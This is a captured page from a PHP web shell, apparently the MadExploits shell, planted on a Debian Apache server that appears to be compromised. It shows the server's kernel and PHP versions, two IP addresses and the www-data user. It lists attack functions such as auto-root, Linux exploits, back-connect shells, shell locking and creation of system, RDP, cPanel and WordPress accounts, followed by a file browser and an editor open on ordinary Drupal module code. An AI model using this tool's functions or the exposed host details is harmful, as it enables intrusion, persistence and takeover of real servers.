Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.140.195.8
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
field_collection /
[ HOME SHELL ]
Name
Size
Permission
Action
ctools
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
LICENSE.txt
17.67
KB
-rw-r--r--
README.txt
1.38
KB
-rw-r--r--
field-collection-item.tpl.php
1.31
KB
-rw-r--r--
field_collection.admin.inc
1.87
KB
-rw-r--r--
field_collection.api.php
5.19
KB
-rw-r--r--
field_collection.info
543
B
-rw-r--r--
field_collection.info.inc
936
B
-rw-r--r--
field_collection.install
10.98
KB
-rw-r--r--
field_collection.migrate.inc
5.33
KB
-rw-r--r--
field_collection.module
70.22
KB
-rw-r--r--
field_collection.pages.inc
5.01
KB
-rw-r--r--
field_collection.test
25.46
KB
-rw-r--r--
field_collection.theme.css
1.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : field_collection.admin.inc
<?php /** * @file * Provides the field_collection module admin pages. */ /** * Menu callback; list all field collections on this site. */ function field_collections_overview() { $instances = field_info_instances(); $field_types = field_info_field_types(); $bundles = field_info_bundles(); $header = array(t('Field name'), t('Used in'), array('data' => t('Operations'), 'colspan' => '2')); $rows = array(); foreach ($instances as $entity_type => $type_bundles) { foreach ($type_bundles as $bundle => $bundle_instances) { foreach ($bundle_instances as $field_name => $instance) { $field = field_info_field($field_name); if ($field['type'] == 'field_collection') { $admin_path = _field_ui_bundle_admin_path($entity_type, $bundle); $rows[$field_name]['class'] = $field['locked'] ? array('menu-disabled') : array(''); $rows[$field_name]['data'][0] = $field['locked'] ? t('@field_name (Locked)', array('@field_name' => $field_name)) : $field_name; $rows[$field_name]['data'][1][] = l($bundles[$entity_type][$bundle]['label'], $admin_path . '/fields'); } } } } foreach ($rows as $field_name => $cell) { $rows[$field_name]['data'][1] = implode(', ', $cell['data'][1]); $field_name_url_str = strtr($field_name, array('_' => '-')); $rows[$field_name]['data'][2] = l(t('manage fields'), 'admin/structure/field-collections/' . $field_name_url_str . '/fields'); $rows[$field_name]['data'][3] = l(t('manage display'), 'admin/structure/field-collections/' . $field_name_url_str . '/display'); } if (empty($rows)) { $output = t('No field collections have been defined yet. To do so attach a field collection field to any entity.'); } else { // Sort rows by field name. ksort($rows); $output = theme('table', array('header' => $header, 'rows' => $rows)); } return $output; }
Close